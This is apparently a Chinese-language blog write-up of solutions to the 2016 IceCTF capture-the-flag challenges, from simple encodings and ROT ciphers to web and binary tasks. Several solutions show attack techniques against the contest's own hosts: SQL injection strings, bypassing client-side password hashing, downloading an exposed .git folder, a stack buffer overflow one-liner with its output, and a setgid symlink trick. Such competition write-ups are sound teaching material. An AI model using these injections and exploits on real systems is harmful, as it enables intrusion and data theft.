2016
Aug
20




https://play.icec.tf/

Stage 1

Hello World!

In this capture the flag competiton you're hunting for these strings, we call them "flags". These flags always begin with "IceCTF{" followed by a message in 1337sp34k and end with "}". Here's an example flag "IceCTF{h3l10_wr0ld}". Try submitting it through the text box down below!

第一题是教学用的,跟你说输入 flag 的格式是 IceCTF{xxxx} ,也跟你说了这题的 flag 是 IceCTF{h3l10_wr0ld} 。

Spotlight

Someone turned out the lights and now we can't find anything. Send halp! spotlight

这题是用 JS canvas 画一张图,你滑鼠移到哪里,探照灯就会照到哪,但是你在图片上是找不到任何有用的线索,直接打开 spotlight.js 看 source code ,Search 一下 flag 就会看到答案了,原来 flag 会印在 Console log 里面。

All your Base are belong to us

What a mess... we got a raw flag but now what do we do... flag.txt

写一小段程式,把每一个二进位 bytes 转成英文字即可得到 flag。

Rotated!

They went and ROTated the flag by 5 and then ROTated it by 8! The scoundrels! Anyway once they were done this was all that was left VprPGS{jnvg_bar_cyhf_1_vf_3?}

用 ROT13 将每个字母转换回来就得到 flag , VprPGS => IceCTF

Move Along

This site seems awfully suspicious, do you think you can figure out what they're hiding?

move_along 这个资料夹没有将 网页 indexes 功能关掉,里面有 flag 相关资料。

Substituted

We got a substitute flag, I hear they are pretty lax on the rules... crypted.txt

从 crypted.txt 中看到一段很像 flag 的文字 "WvyVKT{jzgjrd_zwdkym_ke_reso_dsbdkwksky_tzjqd}" ,很明显的 WvyVKT 要翻成 IceCTF ,所以观察这篇文章,将每个字母对应表找出来,就能得到正确的 flag。

IRC I

There is someone sharing flags on our IRC server, can you find him and stop him? glitch.is:6667

查看 glitch 这个 user 有 join 哪些 room ,其中一个 room 有 flag 。

Alien Message

We found this suspicous image online and it looked like it had been planted there by an alien life form. Can you see if you can figure out what they're trying to tell us?

上 Google 查 alien message , 就会查到对照表,有对照表,flag 就很容易得到了 "good news i like futurama and their amazing easter eggs"。

Time Traveler

I can assure you that the flag was on this website at some point in time.

题目很清楚的告诉我们"时间旅行",要麻看未来时间,不然就看过去时间,解法就是去 https://web.archive.org/ 这个网站,寻将 time-traveler 这个网站,找到他过去时间的页面。

Scavenger Hunt

There is a flag hidden somewhere on our website, do you think you can find it? Good luck!

这题只说 flag 藏在他们的网站,要我们自已去找,线索给的很少,一开始我还以为会藏在 shell 里面,结果 flag 却不是藏在 play.icec.tf 的网站里面,也不在它的分页,最后我是在主站的 sponsors 页面中找到。

Stage 2

Complacent

These silly bankers have gotten pretty complacent with their self signed SSL certificate. I wonder if there's anything in there. complacent.vuln.icec.tf

查看 SSL certificate 就会找到 flag 。

Hidden in Plain Sight

Make sure you take a real close look at it, it should be right there! /home/plain_sight/ or download it here

plain_sight 很明显的告诉我们,flag 是用明确储左,用 vim %!xxd 看 hex dump 的内容,再找一下有关 IceCTF 的字眼,就得到 flag 罗!

Flag Storage

What a cheat, I was promised a flag and I can't even log in. Can you get in for me? flagstorage.vuln.icec.tf. They seem to hash their passwords, but I think the problem is somehow related to this.

题目已经告诉我们要用 SQL Injection ,但是当我们输入 " ' or 1=1-- " 却没办法登入 ,看了网页原始码才发现, password 这一栏被 JS 用 sha-256 加密过,用 chrome inspect element 修改一下 form ,让 password 这个栏位,可以正常送出未加密的 SQL Injection 语法即可得到 flag 。

RSA?

John was messing with RSA again... he encrypted our flag! I have a strong feeling he had no idea what he was doing however, can you get the flag for us? flag.txt

把变数 c 从 hex 转成 ascii 就会得到 flag 。

Thor's a hacker now

Thor has been staring at this for hours and he can't make any sense out of it, can you help him figure out what it is? thor.txt

看 hex string ,前四个字写著 lzip ,上网查查这个名词,发现它是跟 gzip 很像的加解压缩软体 ,lzip 官网在这 http://www.nongnu.org/lzip/manual/lzip_manual.html ,首先下载它的 lzip source code ,再来把 thor.txt 用 linux 指令 xxd -r 转换成 binary file ,再执行 lzip -d thor.lz 得到下面这个错误讯息。

Example
  1. $ cat thor.txt | xxd -r > thor.lz
  2. $ lzip -d thor.lz
  3. thor.lz: Invalid dictionary size in member header.
  4. lzip: Deleting output file 'thor', if it exists.

讯息告诉我们档案的 header 有问题,所以先去 lzip 官网查 header 格式,查到 DS (coded dictionary size, 1 byte) 这个栏位在档案第六个 byte 的位置,一个 byte 0 ~ 255 只有 256 种可能,所以我写一个小程式,将第六个 byte 从 0 试到 255 就成功将这个 lzip 档解出来,也得到 flag。

Exposed!

John is pretty happy with himself, he just made his first website! He used all the hip and cool systems, like NginX, PHP and Git! Everyone is so happy for him, but can you get him to give you the flag?

这个网站把 .git 资料夹也一起上传到伺服器,所以我们要去偷 .git 里 commit 的资料,把 flag 找出来,方式可以参考这篇教学: https://en.internetwache.org/dont-publicly-expose-git-or-how-we-downloaded-your-websites-sourcecode-an-analysis-of-alexas-1m-28-07-2015/。

首先 download http://exposed.vuln.icec.tf/.git/refs/headers/master ,得到一个 hash 过的 object id ,用这个 id 拼出 "git/objects/a0/1751ff89f1c1dfca8b16a81d7dd1f28c18d9ca" 这个路径,就能下载 .git 里面的档案。

找到一个 flag.txt ,但却不是答案 IceCTF{this_isnt_the_flag_either}

看旧一点的 flag.php ,有看到 flag IceCTF{not_this_flag} ,但也不是答案

最后下载每一个 blob 档,在其中一个 git object id 中得到正确的 flag。

结束后,我写了一个工具,用程式来自动下载 .git 资料夹 : https://github.com/puritys/download-git

Smashing Profit!

Do you think you can make this program jump to somewhere it isn't supposed to? Where we're going we don't need buffers! /home/profit/ on the shell.

登入 IceCTF shell ,然后先用 gdb profit 来看程式的 assemble 执行过程,使用 disass main, disass start,再自已改 memory address: disass 0x0804850c 可以查到有一个 function 叫 flag 。


  • disass main , disass start , disass flag
  • 执行 profit 并输入一个很长的 args ,试著造成程式 coredump,并记下 args 的长度。
  • 在 gdb 中查询 coredump memory log,会找到被 buffer overflow 写入的位址被我们覆写了。
  • 这题要覆写两个地方,分别是 1. 0x0804850b 这是 function flag 的执行点,2. 0x0804858d 这是 function main 的执行点,让程式执行我们覆写的 address ,先执行 flag 再执行一次 main ,程式就会印出 flag 。
Example
  1. echo -e 0x8d,0x85,0x04,0x08,0x0b,0x85,0x04,0x08 | xxd -r | xargs -t -n 1 -I% echo "aaaaaaaaaaaaaaaaabbbbbbbbaaaaaaaaaaaaaaaaabbbbbbbbaaabbbbaaaaaaaaaaaflag%" | ./profit
  2.  
  3. //result
  4. Smashing the stack for fun and...?
  5. IceCTF{who_xxx_xxxxx}

Demo

I found this awesome premium shell, but my demo version just ran out... can you help me crack it? /home/demo/ on the shell.
file list
  1. -rwxr-sr-x 1 root demo 5.6K Aug 12 09:08 demo
  2. -rw-r--r-- 1 root root 458 Aug 12 09:08 demo.c
  3. -r--r----- 1 root demo 33 Aug 12 09:08 flag.txt
  4. -rw-r--r-- 1 root root 83 Aug 12 09:08 Makefile

getenv("_") 代表取得执行档的名称 (如 demo),所以我将 demo 改名为 icesh,这样就能够通过第一关进入 shell ,但是进入 shell 的身份是我们自已的 account,还是没有权限读取 flag.txx,再看程式码发现有一行 getegid , setresgid ,这行会取得 effective group id ,也就是档案的 group,然后再 set 到 real group,看样子我们得执行原生的 demo 档才行,因为这样档案才有 demo 这个 group,最后我使用 symbolic link 拿到 flag: ln -s /home/demo/demo ~/icesh

Miners!

The miners website has been working on adding a login portal so that all miners can get the flag, but they haven't made any accounts! However, your boss demands the flag now! Can you get in anyway? miners.vuln.icec.tf

资料库没有帐号,所以可以用 "union" 的方式得到一笔资料,"' union all select ..."。

Kitty

They managed to secure their website this time and moved the hashing to the server :(. We managed to leak this hash of the admin's password though! c7e83c01ed3ef54812673569b2d79c4e1f6554ffeb27706e98c067de9ab12d1a. Can you get the flag? kitty.vuln.icec.tf

Google 那段 hash string ,就会知道密码是 "?o??*" 。


回應 (Leave a comment)